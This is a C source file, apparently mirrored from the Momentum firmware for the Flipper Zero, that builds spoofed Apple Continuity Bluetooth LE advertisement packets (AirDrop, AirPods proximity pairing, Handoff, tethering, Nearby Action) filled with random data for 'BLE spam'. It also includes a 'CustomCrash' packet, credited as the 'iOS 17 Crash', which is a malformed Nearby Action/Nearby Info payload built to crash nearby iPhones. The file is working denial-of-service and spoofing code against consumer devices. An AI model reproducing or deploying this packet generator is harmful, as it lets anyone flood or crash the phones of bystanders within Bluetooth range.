mirror of
https://github.com/Next-Flip/Momentum-Firmware.git
synced 2026-04-27 03:49:58 -07:00
166 lines
6.5 KiB
C
166 lines
6.5 KiB
C
#include "continuity.h"
|
|
#include <furi_hal_random.h>
|
|
#include <core/core_defines.h>
|
|
|
|
// Hacked together by @Willy-JL
|
|
// Custom adv logic by @Willy-JL (idea by @xMasterX)
|
|
// iOS 17 Crash by @ECTO-1A
|
|
// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A
|
|
// Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/
|
|
// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/
|
|
// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
|
|
|
|
static const char* continuity_type_names[ContinuityTypeCount] = {
|
|
[ContinuityTypeAirDrop] = "AirDrop",
|
|
[ContinuityTypeProximityPair] = "Proximity Pair",
|
|
[ContinuityTypeAirplayTarget] = "Airplay Target",
|
|
[ContinuityTypeHandoff] = "Handoff",
|
|
[ContinuityTypeTetheringSource] = "Tethering Source",
|
|
[ContinuityTypeNearbyAction] = "Nearby Action",
|
|
[ContinuityTypeNearbyInfo] = "Nearby Info",
|
|
[ContinuityTypeCustomCrash] = "Custom Packet",
|
|
};
|
|
const char* continuity_get_type_name(ContinuityType type) {
|
|
return continuity_type_names[type];
|
|
}
|
|
|
|
#define HEADER_LEN (6) // 1 Length + 1 ? + 2 Company ID + 1 Continuity Type + 1 Continuity Length
|
|
static uint8_t continuity_packet_sizes[ContinuityTypeCount] = {
|
|
[ContinuityTypeAirDrop] = HEADER_LEN + 18,
|
|
[ContinuityTypeProximityPair] = HEADER_LEN + 25,
|
|
[ContinuityTypeAirplayTarget] = HEADER_LEN + 6,
|
|
[ContinuityTypeHandoff] = HEADER_LEN + 14,
|
|
[ContinuityTypeTetheringSource] = HEADER_LEN + 6,
|
|
[ContinuityTypeNearbyAction] = HEADER_LEN + 5,
|
|
[ContinuityTypeNearbyInfo] = HEADER_LEN + 5,
|
|
[ContinuityTypeCustomCrash] = HEADER_LEN + 11,
|
|
};
|
|
uint8_t continuity_get_packet_size(ContinuityType type) {
|
|
return continuity_packet_sizes[type];
|
|
}
|
|
|
|
void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) {
|
|
uint8_t size = continuity_get_packet_size(msg->type);
|
|
uint8_t i = 0;
|
|
|
|
packet[i++] = size - 1; // Packet Length
|
|
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
|
|
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = msg->type; // Continuity Type
|
|
packet[i] = size - i - 1; // Continuity Length
|
|
i++;
|
|
|
|
switch(msg->type) {
|
|
case ContinuityTypeAirDrop:
|
|
packet[i++] = 0x00; // Zeros
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x00; // ...
|
|
packet[i++] = 0x01; // Version
|
|
packet[i++] = (rand() % 256); // AppleID
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // Phone Number
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // Email
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // Email2
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = 0x00; // Zero
|
|
break;
|
|
|
|
case ContinuityTypeProximityPair:
|
|
packet[i++] = msg->data.proximity_pair.prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05)
|
|
packet[i++] = msg->data.proximity_pair.model >> 8;
|
|
packet[i++] = msg->data.proximity_pair.model & 0xFF;
|
|
packet[i++] = 0x55; // Status
|
|
packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level
|
|
packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level
|
|
packet[i++] = (rand() % 256); // Lid Open Counter
|
|
packet[i++] = 0x00; // Device Color
|
|
packet[i++] = 0x00;
|
|
furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload
|
|
i += 16;
|
|
break;
|
|
|
|
case ContinuityTypeAirplayTarget:
|
|
packet[i++] = (rand() % 256); // Flags
|
|
packet[i++] = (rand() % 256); // Configuration Seed
|
|
packet[i++] = (rand() % 256); // IPv4 Address
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
break;
|
|
|
|
case ContinuityTypeHandoff:
|
|
packet[i++] = 0x01; // Version
|
|
packet[i++] = (rand() % 256); // Initialization Vector
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // AES-GCM Auth Tag
|
|
packet[i++] = (rand() % 256); // Encrypted Payload
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
break;
|
|
|
|
case ContinuityTypeTetheringSource:
|
|
packet[i++] = 0x01; // Version
|
|
packet[i++] = (rand() % 256); // Flags
|
|
packet[i++] = (rand() % 101); // Battery Life
|
|
packet[i++] = 0x00; // Cell Service Type
|
|
packet[i++] = (rand() % 8); // ...
|
|
packet[i++] = (rand() % 5); // Cell Service Strength
|
|
break;
|
|
|
|
case ContinuityTypeNearbyAction:
|
|
packet[i] = msg->data.nearby_action.flags; // Action Flags
|
|
if(packet[i] == 0xBF && rand() % 2) packet[i]++; // Ugly hack to shift 0xBF-0xC0 for spam
|
|
i++;
|
|
packet[i++] = msg->data.nearby_action.type;
|
|
furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
|
|
i += 3;
|
|
break;
|
|
|
|
case ContinuityTypeNearbyInfo:
|
|
packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code
|
|
packet[i++] = (rand() % 256); // Status Flags
|
|
packet[i++] = (rand() % 256); // Authentication Tag
|
|
packet[i++] = (rand() % 256); // ...
|
|
packet[i++] = (rand() % 256); // ...
|
|
break;
|
|
|
|
case ContinuityTypeCustomCrash:
|
|
// Found by @ECTO-1A
|
|
|
|
i -= 2; // Override segment header
|
|
packet[i++] = ContinuityTypeNearbyAction; // Type
|
|
packet[i++] = 0x05; // Length
|
|
packet[i++] = 0xC1; // Action Flags
|
|
const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0};
|
|
packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type
|
|
furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
|
|
i += 3;
|
|
|
|
packet[i++] = 0x00; // ???
|
|
packet[i++] = 0x00; // ???
|
|
|
|
packet[i++] = ContinuityTypeNearbyInfo; // Type ???
|
|
furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ???
|
|
i += 3;
|
|
break;
|
|
|
|
default:
|
|
break;
|
|
}
|
|
}
|